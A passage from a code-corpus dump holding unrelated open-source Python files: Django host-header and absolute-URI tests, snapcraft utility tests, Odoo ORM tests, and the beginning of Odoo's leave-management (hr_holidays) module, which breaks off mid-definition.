'HTTP_HOST': "invalid_hostname.com",
}
self.assertEqual(request.get_host(), "invalid_hostname.com")
@override_settings(ALLOWED_HOSTS=[])
def test_get_host_suggestion_of_allowed_host(self):
"""get_host() makes helpful suggestions if a valid-looking host is not in ALLOWED_HOSTS."""
msg_invalid_host = "Invalid HTTP_HOST header: %r."
msg_suggestion = msg_invalid_host + " You may need to add %r to ALLOWED_HOSTS."
msg_suggestion2 = msg_invalid_host + " The domain name provided is not valid according to RFC 1034/1035"
for host in [ # Valid-looking hosts
'example.com',
'12.34.56.78',
'[2001:19f0:feee::dead:beef:cafe]',
'xn--4ca9at.com', # Punycode for öäü.com
]:
request = HttpRequest()
request.META = {'HTTP_HOST': host}
self.assertRaisesMessage(
SuspiciousOperation,
msg_suggestion % (host, host),
request.get_host
)
for domain, port in [ # Valid-looking hosts with a port number
('example.com', 80),
('12.34.56.78', 443),
('[2001:19f0:feee::dead:beef:cafe]', 8080),
]:
host = '%s:%s' % (domain, port)
request = HttpRequest()
request.META = {'HTTP_HOST': host}
self.assertRaisesMessage(
SuspiciousOperation,
msg_suggestion % (host, domain),
request.get_host
)
for host in self.poisoned_hosts:
request = HttpRequest()
request.META = {'HTTP_HOST': host}
self.assertRaisesMessage(
SuspiciousOperation,
msg_invalid_host % host,
request.get_host
)
request = HttpRequest()
request.META = {'HTTP_HOST': "invalid_hostname.com"}
self.assertRaisesMessage(
SuspiciousOperation,
msg_suggestion2 % "invalid_hostname.com",
request.get_host
)
class BuildAbsoluteURITestCase(SimpleTestCase):
"""
Regression tests for ticket #18314.
"""
def setUp(self):
self.factory = RequestFactory()
def test_build_absolute_uri_no_location(self):
"""
Ensures that ``request.build_absolute_uri()`` returns the proper value
when the ``location`` argument is not provided, and ``request.path``
begins with //.
"""
# //// is needed to create a request with a path beginning with //
request = self.factory.get('////absolute-uri')
self.assertEqual(
request.build_absolute_uri(),
'http://testserver//absolute-uri'
)
def test_build_absolute_uri_absolute_location(self):
"""
Ensures that ``request.build_absolute_uri()`` returns the proper value
when an absolute URL ``location`` argument is provided, and
``request.path`` begins with //.
"""
# //// is needed to create a request with a path beginning with //
request = self.factory.get('////absolute-uri')
self.assertEqual(
request.build_absolute_uri(location='http://example.com/?foo=bar'),
'http://example.com/?foo=bar'
)
def test_build_absolute_uri_schema_relative_location(self):
"""
Ensures that ``request.build_absolute_uri()`` returns the proper value
when a schema-relative URL ``location`` argument is provided, and
``request.path`` begins with //.
"""
# //// is needed to create a request with a path beginning with //
request = self.factory.get('////absolute-uri')
self.assertEqual(
request.build_absolute_uri(location='//example.com/?foo=bar'),
'http://example.com/?foo=bar'
)
def test_build_absolute_uri_relative_location(self):
"""
Ensures that ``request.build_absolute_uri()`` returns the proper value
when a relative URL ``location`` argument is provided, and
``request.path`` begins with //.
"""
# //// is needed to create a request with a path beginning with //
request = self.factory.get('////absolute-uri')
self.assertEqual(
request.build_absolute_uri(location='/foo/bar/'),
'http://testserver/foo/bar/'
)
| mit |
mvo5/snapcraft | tests/unit/test_common.py | 3 | 6507 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015-2018 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import Equals
from snapcraft.internal import common, errors
from tests import unit
class CommonTestCase(unit.TestCase):
def test_set_plugindir(self):
plugindir = os.path.join(self.path, "testplugin")
common.set_plugindir(plugindir)
self.assertThat(plugindir, Equals(common.get_plugindir()))
def test_isurl(self):
self.assertTrue(common.isurl("git://"))
self.assertTrue(common.isurl("bzr://"))
self.assertFalse(common.isurl("./"))
self.assertFalse(common.isurl("/foo"))
self.assertFalse(common.isurl("/fo:o"))
class CommonMigratedTestCase(unit.TestCase):
def test_parallel_build_count_migration_message(self):
raised = self.assertRaises(
errors.PluginOutdatedError, common.get_parallel_build_count
)
self.assertThat(
str(raised), Equals("This plugin is outdated: use 'parallel_build_count'")
)
def test_deb_arch_migration_message(self):
raised = self.assertRaises(errors.PluginOutdatedError, common.get_arch)
self.assertThat(
str(raised), Equals("This plugin is outdated: use 'project.deb_arch'")
)
def test_arch_triplet_migration_message(self):
raised = self.assertRaises(errors.PluginOutdatedError, common.get_arch_triplet)
self.assertThat(
str(raised), Equals("This plugin is outdated: use 'project.arch_triplet'")
)
class FormatInColumnsTestCase(unit.TestCase):
elements_list = [
"ant",
"autotools",
"catkin",
"cmake",
"copy",
"go",
"jdk",
"kbuild",
"kernel",
"make",
"maven",
"nil",
"nodejs",
"python2",
"python3",
"scons",
"tar-content",
]
def test_format_output_in_columns_default(self):
"""Format output on 2 lines, with default max-width and space sep"""
expected = [
"ant catkin copy jdk kernel maven "
"nodejs python3 tar-content",
"autotools cmake go kbuild make nil python2 scons ",
]
self.assertThat(
common.format_output_in_columns(self.elements_list), Equals(expected)
)
def test_format_output_in_columns_narrow(self):
"""Format output on 3 lines, with narrow max-width and space sep"""
expected = [
"ant cmake jdk make nodejs scons ",
"autotools copy kbuild maven python2 tar-content",
"catkin go kernel nil python3",
]
self.assertThat(
common.format_output_in_columns(self.elements_list, max_width=60),
Equals(expected),
)
def test_format_output_in_columns_large(self):
"""Format output on one big line, with default space sep"""
expected = [
"ant autotools catkin cmake copy go jdk kbuild "
"kernel make maven nil nodejs python2 python3 "
"scons tar-content"
]
self.assertThat(
common.format_output_in_columns(self.elements_list, max_width=990),
Equals(expected),
)
def test_format_output_in_columns_one_space(self):
"""Format output with one space sep"""
expected = [
"ant cmake jdk make nodejs scons ",
"autotools copy kbuild maven python2 tar-content",
"catkin go kernel nil python3",
]
self.assertThat(
common.format_output_in_columns(
self.elements_list, max_width=60, num_col_spaces=1
),
Equals(expected),
)
class FormatSnapFileNameTest(unit.TestCase):
scenarios = [
(
"all info",
dict(
snap=dict(name="name", version="version", architectures=["amd64"]),
expected="name_version_amd64.snap",
),
),
(
"missing version",
dict(
snap=dict(name="name", architectures=["amd64"]),
allow_empty_version=True,
expected="name_amd64.snap",
),
),
(
"no arch",
dict(
snap=dict(name="name", version="version"),
expected="name_version_all.snap",
),
),
(
"multi",
dict(
snap=dict(
name="name", version="version", architectures=["amd64", "i386"]
),
expected="name_version_multi.snap",
),
),
(
"pack",
dict(
snap=dict(name="name", version="version", arch=["amd64"]),
expected="name_version_amd64.snap",
),
),
(
"pack multi",
dict(
snap=dict(name="name", version="version", arch=["amd64", "i386"]),
expected="name_version_multi.snap",
),
),
]
def test_filename(self):
if hasattr(self, "allow_empty_version"):
snap_name = common.format_snap_name(
self.snap, allow_empty_version=self.allow_empty_version
)
else:
snap_name = common.format_snap_name(self.snap)
self.assertThat(snap_name, Equals(self.expected))
class FormatSnapFileNameErrorTest(unit.TestCase):
def test_version_missing_and_not_allowed_is_error(self):
# A missing version must raise rather than silently producing an
# unexpected file name when empty versions are not allowed.
snap = dict(name="name")
self.assertRaises(KeyError, common.format_snap_name, snap)
| gpl-3.0 |
avoinsystems/odoo | openerp/addons/base/tests/test_orm.py | 149 | 18110 | from collections import defaultdict
from openerp.tools import mute_logger
from openerp.tests import common
UID = common.ADMIN_USER_ID
class TestORM(common.TransactionCase):
""" test special behaviors of ORM CRUD functions
TODO: use real Exception types instead of Exception """
def setUp(self):
super(TestORM, self).setUp()
cr, uid = self.cr, self.uid
self.partner = self.registry('res.partner')
self.users = self.registry('res.users')
self.p1 = self.partner.name_create(cr, uid, 'W')[0]
self.p2 = self.partner.name_create(cr, uid, 'Y')[0]
self.ir_rule = self.registry('ir.rule')
# sample unprivileged user
employee_gid = self.ref('base.group_user')
self.uid2 = self.users.create(cr, uid, {'name': 'test user', 'login': 'test', 'groups_id': [4,employee_gid]})
@mute_logger('openerp.models')
def testAccessDeletedRecords(self):
""" Verify that accessing deleted records works as expected """
cr, uid, uid2, p1, p2 = self.cr, self.uid, self.uid2, self.p1, self.p2
self.partner.unlink(cr, uid, [p1])
# read() is expected to skip deleted records because our API is not
# transactional for a sequence of search()->read() performed from the
# client-side... a concurrent deletion could therefore cause spurious
# exceptions even when simply opening a list view!
# /!\ Using unprivileged user to detect former side effects of ir.rules!
self.assertEqual([{'id': p2, 'name': 'Y'}], self.partner.read(cr, uid2, [p1,p2], ['name']), "read() should skip deleted records")
self.assertEqual([], self.partner.read(cr, uid2, [p1], ['name']), "read() should skip deleted records")
# Deleting an already deleted record should be simply ignored
self.assertTrue(self.partner.unlink(cr, uid, [p1]), "Re-deleting should be a no-op")
# Updating an already deleted record should raise, even as admin
with self.assertRaises(Exception):
self.partner.write(cr, uid, [p1], {'name': 'foo'})
@mute_logger('openerp.models')
def testAccessFilteredRecords(self):
""" Verify that accessing filtered records works as expected for non-admin user """
cr, uid, uid2, p1, p2 = self.cr, self.uid, self.uid2, self.p1, self.p2
partner_model = self.registry('ir.model').search(cr, uid, [('model','=','res.partner')])[0]
self.ir_rule.create(cr, uid, {'name': 'Y is invisible',
'domain_force': [('id', '!=', p1)],
'model_id': partner_model})
# search as unprivileged user
partners = self.partner.search(cr, uid2, [])
self.assertFalse(p1 in partners, "W should not be visible...")
self.assertTrue(p2 in partners, "... but Y should be visible")
# read as unprivileged user
with self.assertRaises(Exception):
self.partner.read(cr, uid2, [p1], ['name'])
# write as unprivileged user
with self.assertRaises(Exception):
self.partner.write(cr, uid2, [p1], {'name': 'foo'})
# unlink as unprivileged user
with self.assertRaises(Exception):
self.partner.unlink(cr, uid2, [p1])
# Prepare mixed case
self.partner.unlink(cr, uid, [p2])
# read mixed records: some deleted and some filtered
with self.assertRaises(Exception):
self.partner.read(cr, uid2, [p1,p2], ['name'])
# delete mixed records: some deleted and some filtered
with self.assertRaises(Exception):
self.partner.unlink(cr, uid2, [p1,p2])
def test_multi_read(self):
record_id = self.partner.create(self.cr, UID, {'name': 'MyPartner1'})
records = self.partner.read(self.cr, UID, [record_id])
self.assertIsInstance(records, list)
def test_one_read(self):
record_id = self.partner.create(self.cr, UID, {'name': 'MyPartner1'})
record = self.partner.read(self.cr, UID, record_id)
self.assertIsInstance(record, dict)
@mute_logger('openerp.models')
def test_search_read(self):
# simple search_read
self.partner.create(self.cr, UID, {'name': 'MyPartner1'})
found = self.partner.search_read(self.cr, UID, [['name', '=', 'MyPartner1']], ['name'])
self.assertEqual(len(found), 1)
self.assertEqual(found[0]['name'], 'MyPartner1')
self.assertTrue('id' in found[0])
# search_read correct order
self.partner.create(self.cr, UID, {'name': 'MyPartner2'})
found = self.partner.search_read(self.cr, UID, [['name', 'like', 'MyPartner']], ['name'], order="name")
self.assertEqual(len(found), 2)
self.assertEqual(found[0]['name'], 'MyPartner1')
self.assertEqual(found[1]['name'], 'MyPartner2')
found = self.partner.search_read(self.cr, UID, [['name', 'like', 'MyPartner']], ['name'], order="name desc")
self.assertEqual(len(found), 2)
self.assertEqual(found[0]['name'], 'MyPartner2')
self.assertEqual(found[1]['name'], 'MyPartner1')
# search_read that finds nothing
found = self.partner.search_read(self.cr, UID, [['name', '=', 'Does not exists']], ['name'])
self.assertEqual(len(found), 0)
def test_exists(self):
partner = self.partner.browse(self.cr, UID, [])
# check that records obtained from search exist
recs = partner.search([])
self.assertTrue(recs)
self.assertEqual(recs.exists(), recs)
# check that there is no record with id 0
recs = partner.browse([0])
self.assertFalse(recs.exists())
def test_groupby_date(self):
partners = dict(
A='2012-11-19',
B='2012-12-17',
C='2012-12-31',
D='2013-01-07',
E='2013-01-14',
F='2013-01-28',
G='2013-02-11',
)
all_partners = []
partners_by_day = defaultdict(set)
partners_by_month = defaultdict(set)
partners_by_year = defaultdict(set)
for name, date in partners.items():
p = self.partner.create(self.cr, UID, dict(name=name, date=date))
all_partners.append(p)
partners_by_day[date].add(p)
partners_by_month[date.rsplit('-', 1)[0]].add(p)
partners_by_year[date.split('-', 1)[0]].add(p)
def read_group(interval, domain=None):
main_domain = [('id', 'in', all_partners)]
if domain:
domain = ['&'] + main_domain + domain
else:
domain = main_domain
rg = self.partner.read_group(self.cr, self.uid, domain, ['date'], 'date' + ':' + interval)
result = {}
for r in rg:
result[r['date:' + interval]] = set(self.partner.search(self.cr, self.uid, r['__domain']))
return result
self.assertEqual(len(read_group('day')), len(partners_by_day))
self.assertEqual(len(read_group('month')), len(partners_by_month))
self.assertEqual(len(read_group('year')), len(partners_by_year))
rg = self.partner.read_group(self.cr, self.uid, [('id', 'in', all_partners)],
['date'], ['date:month', 'date:day'], lazy=False)
self.assertEqual(len(rg), len(all_partners))
class TestInherits(common.TransactionCase):
""" test the behavior of the orm for models that use _inherits;
specifically: res.users, that inherits from res.partner
"""
def setUp(self):
super(TestInherits, self).setUp()
self.partner = self.registry('res.partner')
self.user = self.registry('res.users')
def test_default(self):
""" `default_get` cannot return a dictionary or a new id """
defaults = self.user.default_get(self.cr, UID, ['partner_id'])
if 'partner_id' in defaults:
self.assertIsInstance(defaults['partner_id'], (bool, int, long))
def test_create(self):
""" creating a user should automatically create a new partner """
partners_before = self.partner.search(self.cr, UID, [])
foo_id = self.user.create(self.cr, UID, {'name': 'Foo', 'login': 'foo', 'password': 'foo'})
foo = self.user.browse(self.cr, UID, foo_id)
self.assertNotIn(foo.partner_id.id, partners_before)
def test_create_with_ancestor(self):
""" creating a user with a specific 'partner_id' should not create a new partner """
par_id = self.partner.create(self.cr, UID, {'name': 'Foo'})
partners_before = self.partner.search(self.cr, UID, [])
foo_id = self.user.create(self.cr, UID, {'partner_id': par_id, 'login': 'foo', 'password': 'foo'})
partners_after = self.partner.search(self.cr, UID, [])
self.assertEqual(set(partners_before), set(partners_after))
foo = self.user.browse(self.cr, UID, foo_id)
self.assertEqual(foo.name, 'Foo')
self.assertEqual(foo.partner_id.id, par_id)
@mute_logger('openerp.models')
def test_read(self):
""" inherited fields should be read without any indirection """
foo_id = self.user.create(self.cr, UID, {'name': 'Foo', 'login': 'foo', 'password': 'foo'})
foo_values, = self.user.read(self.cr, UID, [foo_id])
partner_id = foo_values['partner_id'][0]
partner_values, = self.partner.read(self.cr, UID, [partner_id])
self.assertEqual(foo_values['name'], partner_values['name'])
foo = self.user.browse(self.cr, UID, foo_id)
self.assertEqual(foo.name, foo.partner_id.name)
@mute_logger('openerp.models')
def test_copy(self):
""" copying a user should automatically copy its partner, too """
foo_id = self.user.create(self.cr, UID, {
'name': 'Foo',
'login': 'foo',
'password': 'foo',
'supplier': True,
})
foo_before, = self.user.read(self.cr, UID, [foo_id])
del foo_before['__last_update']
bar_id = self.user.copy(self.cr, UID, foo_id, {
'login': 'bar',
'password': 'bar',
})
foo_after, = self.user.read(self.cr, UID, [foo_id])
del foo_after['__last_update']
self.assertEqual(foo_before, foo_after)
foo, bar = self.user.browse(self.cr, UID, [foo_id, bar_id])
self.assertEqual(bar.name, 'Foo (copy)')
self.assertEqual(bar.login, 'bar')
self.assertEqual(foo.supplier, bar.supplier)
self.assertNotEqual(foo.id, bar.id)
self.assertNotEqual(foo.partner_id.id, bar.partner_id.id)
@mute_logger('openerp.models')
def test_copy_with_ancestor(self):
""" copying a user with 'parent_id' in defaults should not duplicate the partner """
foo_id = self.user.create(self.cr, UID, {'name': 'Foo', 'login': 'foo', 'password': 'foo',
'login_date': '2016-01-01', 'signature': 'XXX'})
par_id = self.partner.create(self.cr, UID, {'name': 'Bar'})
foo_before, = self.user.read(self.cr, UID, [foo_id])
del foo_before['__last_update']
partners_before = self.partner.search(self.cr, UID, [])
bar_id = self.user.copy(self.cr, UID, foo_id, {'partner_id': par_id, 'login': 'bar'})
foo_after, = self.user.read(self.cr, UID, [foo_id])
del foo_after['__last_update']
partners_after = self.partner.search(self.cr, UID, [])
self.assertEqual(foo_before, foo_after)
self.assertEqual(set(partners_before), set(partners_after))
foo, bar = self.user.browse(self.cr, UID, [foo_id, bar_id])
self.assertNotEqual(foo.id, bar.id)
self.assertEqual(bar.partner_id.id, par_id)
self.assertEqual(bar.login, 'bar', "login is given from copy parameters")
self.assertFalse(bar.login_date, "login_date should not be copied from original record")
self.assertEqual(bar.name, 'Bar', "name is given from specific partner")
self.assertEqual(bar.signature, foo.signature, "signature should be copied")
CREATE = lambda values: (0, False, values)
UPDATE = lambda id, values: (1, id, values)
DELETE = lambda id: (2, id, False)
FORGET = lambda id: (3, id, False)
LINK_TO = lambda id: (4, id, False)
DELETE_ALL = lambda: (5, False, False)
REPLACE_WITH = lambda ids: (6, False, ids)
def sorted_by_id(list_of_dicts):
"sort dictionaries by their 'id' field; useful for comparisons"
return sorted(list_of_dicts, key=lambda d: d.get('id'))
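# For orientation, a hedged sketch of how a client would combine these
# command tuples in a single write() call (the parent id and child values
# below are hypothetical, not taken from this test suite):
#
#   partner.write(cr, UID, [parent_id], {'child_ids': [
#       CREATE({'name': 'new child'}),    # (0, False, {...}) creates a record
#       UPDATE(child_id, {'name': 'x'}),  # (1, id, {...}) updates in place
#       DELETE(other_id),                 # (2, id, False) deletes the record
#       LINK_TO(existing_id),             # (4, id, False) links an existing one
#   ]})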
class TestO2MSerialization(common.TransactionCase):
""" test the orm method 'write' on one2many fields """
def setUp(self):
super(TestO2MSerialization, self).setUp()
self.partner = self.registry('res.partner')
def test_no_command(self):
" empty list of commands yields an empty list of records "
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', [])
self.assertEqual(results, [])
def test_CREATE_commands(self):
" returns the VALUES dict as-is "
values = [{'foo': 'bar'}, {'foo': 'baz'}, {'foo': 'baq'}]
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', map(CREATE, values))
self.assertEqual(results, values)
def test_LINK_TO_command(self):
" reads the records from the database, records are returned with their ids. "
ids = [
self.partner.create(self.cr, UID, {'name': 'foo'}),
self.partner.create(self.cr, UID, {'name': 'bar'}),
self.partner.create(self.cr, UID, {'name': 'baz'})
]
commands = map(LINK_TO, ids)
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', commands, ['name'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'id': ids[0], 'name': 'foo'},
{'id': ids[1], 'name': 'bar'},
{'id': ids[2], 'name': 'baz'}
]))
def test_bare_ids_command(self):
" same as the equivalent LINK_TO commands "
ids = [
self.partner.create(self.cr, UID, {'name': 'foo'}),
self.partner.create(self.cr, UID, {'name': 'bar'}),
self.partner.create(self.cr, UID, {'name': 'baz'})
]
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', ids, ['name'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'id': ids[0], 'name': 'foo'},
{'id': ids[1], 'name': 'bar'},
{'id': ids[2], 'name': 'baz'}
]))
def test_UPDATE_command(self):
" take the in-db records and merge the provided information in "
id_foo = self.partner.create(self.cr, UID, {'name': 'foo'})
id_bar = self.partner.create(self.cr, UID, {'name': 'bar'})
id_baz = self.partner.create(self.cr, UID, {'name': 'baz', 'city': 'tag'})
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', [
LINK_TO(id_foo),
UPDATE(id_bar, {'name': 'qux', 'city': 'tagtag'}),
UPDATE(id_baz, {'name': 'quux'})
], ['name', 'city'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'id': id_foo, 'name': 'foo', 'city': False},
{'id': id_bar, 'name': 'qux', 'city': 'tagtag'},
{'id': id_baz, 'name': 'quux', 'city': 'tag'}
]))
def test_DELETE_command(self):
" deleted records are not returned at all. "
ids = [
self.partner.create(self.cr, UID, {'name': 'foo'}),
self.partner.create(self.cr, UID, {'name': 'bar'}),
self.partner.create(self.cr, UID, {'name': 'baz'})
]
commands = [DELETE(ids[0]), DELETE(ids[1]), DELETE(ids[2])]
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', commands, ['name'])
self.assertEqual(results, [])
def test_mixed_commands(self):
ids = [
self.partner.create(self.cr, UID, {'name': name})
for name in ['NObar', 'baz', 'qux', 'NOquux', 'NOcorge', 'garply']
]
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', [
CREATE({'name': 'foo'}),
UPDATE(ids[0], {'name': 'bar'}),
LINK_TO(ids[1]),
DELETE(ids[2]),
UPDATE(ids[3], {'name': 'quux',}),
UPDATE(ids[4], {'name': 'corge'}),
CREATE({'name': 'grault'}),
LINK_TO(ids[5])
], ['name'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'name': 'foo'},
{'id': ids[0], 'name': 'bar'},
{'id': ids[1], 'name': 'baz'},
{'id': ids[3], 'name': 'quux'},
{'id': ids[4], 'name': 'corge'},
{'name': 'grault'},
{'id': ids[5], 'name': 'garply'}
]))
def test_LINK_TO_pairs(self):
"LINK_TO commands can be written as pairs, instead of triplets"
ids = [
self.partner.create(self.cr, UID, {'name': 'foo'}),
self.partner.create(self.cr, UID, {'name': 'bar'}),
self.partner.create(self.cr, UID, {'name': 'baz'})
]
commands = map(lambda id: (4, id), ids)
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', commands, ['name'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'id': ids[0], 'name': 'foo'},
{'id': ids[1], 'name': 'bar'},
{'id': ids[2], 'name': 'baz'}
]))
def test_singleton_commands(self):
"DELETE_ALL can appear as a singleton"
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', [DELETE_ALL()], ['name'])
self.assertEqual(results, [])
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
avoinsystems/odoo | addons/hr_holidays/hr_holidays.py | 159 | 33482 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2005-2006 Axelor SARL. (http://www.axelor.com)
# and 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# $Id: hr.py 4656 2006-11-24 09:58:42Z Cyp $
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
import math
import time
from operator import attrgetter
from openerp.exceptions import Warning
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.translate import _
class hr_holidays_status(osv.osv):
_name = "hr.holidays.status"
_description = "Leave Type"
def get_days(self, cr, uid, ids, employee_id, context=None):
result = dict((id, dict(max_leaves=0, leaves_taken=0, remaining_leaves=0,
virtual_remaining_leaves=0)) for id in ids)
holiday_ids = self.pool['hr.holidays'].search(cr, uid, [('employee_id', '=', employee_id),
('state', 'in', ['confirm', 'validate1', 'validate']),
('holiday_status_id', 'in', ids)
], context=context)
for holiday in self.pool['hr.holidays'].browse(cr, uid, holiday_ids, context=context):
status_dict = result[holiday.holiday_status_id.id]
if holiday.type == 'add':
status_dict['virtual_remaining_leaves'] += holiday.number_of_days_temp
if holiday.state == 'validate':
status_dict['max_leaves'] += holiday.number_of_days_temp
status_dict['remaining_leaves'] += holiday.number_of_days_temp
elif holiday.type == 'remove': # number of days is negative
status_dict['virtual_remaining_leaves'] -= holiday.number_of_days_temp
if holiday.state == 'validate':
status_dict['leaves_taken'] += holiday.number_of_days_temp
status_dict['remaining_leaves'] -= holiday.number_of_days_temp
return result
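# Illustrative shape of the mapping returned above (hypothetical values):
# with one validated 10-day allocation and one confirmed, not yet validated,
# 2-day leave request, a status entry reads
#   {'max_leaves': 10, 'leaves_taken': 0,
#    'remaining_leaves': 10, 'virtual_remaining_leaves': 8}
# i.e. 'virtual_remaining_leaves' already counts requests waiting approval.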
def _user_left_days(self, cr, uid, ids, name, args, context=None):
employee_id = False
if context and 'employee_id' in context:
employee_id = context['employee_id']
else:
employee_ids = self.pool.get('hr.employee').search(cr, uid, [('user_id', '=', uid)], context=context)
if employee_ids:
employee_id = employee_ids[0]
if employee_id:
res = self.get_days(cr, uid, ids, employee_id, context=context)
else:
res = dict((res_id, {'leaves_taken': 0, 'remaining_leaves': 0, 'max_leaves': 0}) for res_id in ids)
return res
_columns = {
'name': fields.char('Leave Type', size=64, required=True, translate=True),
'categ_id': fields.many2one('calendar.event.type', 'Meeting Type',
help='Once a leave is validated, Odoo will create a corresponding meeting of this type in the calendar.'),
'color_name': fields.selection([('red', 'Red'),('blue','Blue'), ('lightgreen', 'Light Green'), ('lightblue','Light Blue'), ('lightyellow', 'Light Yellow'), ('magenta', 'Magenta'),('lightcyan', 'Light Cyan'),('black', 'Black'),('lightpink', 'Light Pink'),('brown', 'Brown'),('violet', 'Violet'),('lightcoral', 'Light Coral'),('lightsalmon', 'Light Salmon'),('lavender', 'Lavender'),('wheat', 'Wheat'),('ivory', 'Ivory')],'Color in Report', required=True, help='This color will be used in the leaves summary located in Reporting\Leaves by Department.'),
'limit': fields.boolean('Allow to Override Limit', help='If you select this check box, the system allows the employees to take more leaves than the available ones for this type and will not take them into account for the "Remaining Legal Leaves" defined on the employee form.'),
'active': fields.boolean('Active', help="If the active field is set to false, it will allow you to hide the leave type without removing it."),
'max_leaves': fields.function(_user_left_days, string='Maximum Allowed', help='This value is given by the sum of all holiday requests with a positive value.', multi='user_left_days'),
'leaves_taken': fields.function(_user_left_days, string='Leaves Already Taken', help='This value is given by the sum of all holiday requests with a negative value.', multi='user_left_days'),
'remaining_leaves': fields.function(_user_left_days, string='Remaining Leaves', help='Maximum Leaves Allowed - Leaves Already Taken', multi='user_left_days'),
'virtual_remaining_leaves': fields.function(_user_left_days, string='Virtual Remaining Leaves', help='Maximum Leaves Allowed - Leaves Already Taken - Leaves Waiting Approval', multi='user_left_days'),
'double_validation': fields.boolean('Apply Double Validation', help="When selected, the Allocation/Leave Requests for this type require a second validation to be approved."),
}
_defaults = {
'color_name': 'red',
'active': True,
}
def name_get(self, cr, uid, ids, context=None):
if context is None:
context = {}
if not context.get('employee_id',False):
# leave counts are based on employee_id and would be inaccurate without the correct employee in context
return super(hr_holidays_status, self).name_get(cr, uid, ids, context=context)
res = []
for record in self.browse(cr, uid, ids, context=context):
name = record.name
if not record.limit:
name = name + (' (%g/%g)' % (record.leaves_taken or 0.0, record.max_leaves or 0.0))
res.append((record.id, name))
return res
class hr_holidays(osv.osv):
_name = "hr.holidays"
_description = "Leave"
_order = "type desc, date_from asc"
_inherit = ['mail.thread', 'ir.needaction_mixin']
_track = {
'state': {
'hr_holidays.mt_holidays_approved': lambda self, cr, uid, obj, ctx=None: obj.state == 'validate',
'hr_holidays.mt_holidays_refused': lambda self, cr, uid, obj, ctx=None: obj.state == 'refuse',
'hr_holidays.mt_holidays_confirmed': lambda self, cr, uid, obj, ctx=None: obj.state == 'confirm',
},
}
def _employee_get(self, cr, uid, context=None):
emp_id = context.get('default_employee_id', False)
if emp_id:
return emp_id
ids = self.pool.get('hr.employee').search(cr, uid, [('user_id', '=', uid)], context=context)
if ids:
return ids[0]
return False
def _compute_number_of_days(self, cr, uid, ids, name, args, context=None):
result = {}
for hol in self.browse(cr, uid, ids, context=context):
if hol.type=='remove':
result[hol.id] = -hol.number_of_days_temp
else:
result[hol.id] = hol.number_of_days_temp
return result
def _get_can_reset(self, cr, uid, ids, name, arg, context=None):
"""User can reset a leave request if it is its own leave request or if
he is an Hr Manager. """
user = self.pool['res.users'].browse(cr, uid, uid, context=context)
group_hr_manager_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'group_hr_manager')[1]
if group_hr_manager_id in [g.id for g in user.groups_id]:
return dict.fromkeys(ids, True)
result = dict.fromkeys(ids, False)
for holiday in self.browse(cr, uid, ids, context=context):
if holiday.employee_id and holiday.employee_id.user_id and holiday.employee_id.user_id.id == uid:
result[holiday.id] = True
return result
def _check_date(self, cr, uid, ids, context=None):
for holiday in self.browse(cr, uid, ids, context=context):
domain = [
('date_from', '<=', holiday.date_to),
('date_to', '>=', holiday.date_from),
('employee_id', '=', holiday.employee_id.id),
('id', '!=', holiday.id),
('state', 'not in', ['cancel', 'refuse']),
]
nholidays = self.search_count(cr, uid, domain, context=context)
if nholidays:
return False
return True
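# Note on the domain above: two intervals [f1, t1] and [f2, t2] overlap
# exactly when f1 <= t2 and t1 >= f2, which the date_from/date_to leaves of
# the domain encode. Illustrative dates: [01-07, 01-09] vs [01-09, 01-10]
# overlap (they share a day), while [01-07, 01-08] vs [01-09, 01-10] do not.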
_check_holidays = lambda self, cr, uid, ids, context=None: self.check_holidays(cr, uid, ids, context=context)
_columns = {
'name': fields.char('Description', size=64),
'state': fields.selection([('draft', 'To Submit'), ('cancel', 'Cancelled'),('confirm', 'To Approve'), ('refuse', 'Refused'), ('validate1', 'Second Approval'), ('validate', 'Approved')],
'Status', readonly=True, track_visibility='onchange', copy=False,
help='The status is set to \'To Submit\', when a holiday request is created.\
\nThe status is \'To Approve\', when holiday request is confirmed by user.\
\nThe status is \'Refused\', when holiday request is refused by manager.\
\nThe status is \'Approved\', when holiday request is approved by manager.'),
'user_id':fields.related('employee_id', 'user_id', type='many2one', relation='res.users', string='User', store=True),
'date_from': fields.datetime('Start Date', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, select=True, copy=False),
'date_to': fields.datetime('End Date', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, copy=False),
'holiday_status_id': fields.many2one("hr.holidays.status", "Leave Type", required=True,readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}),
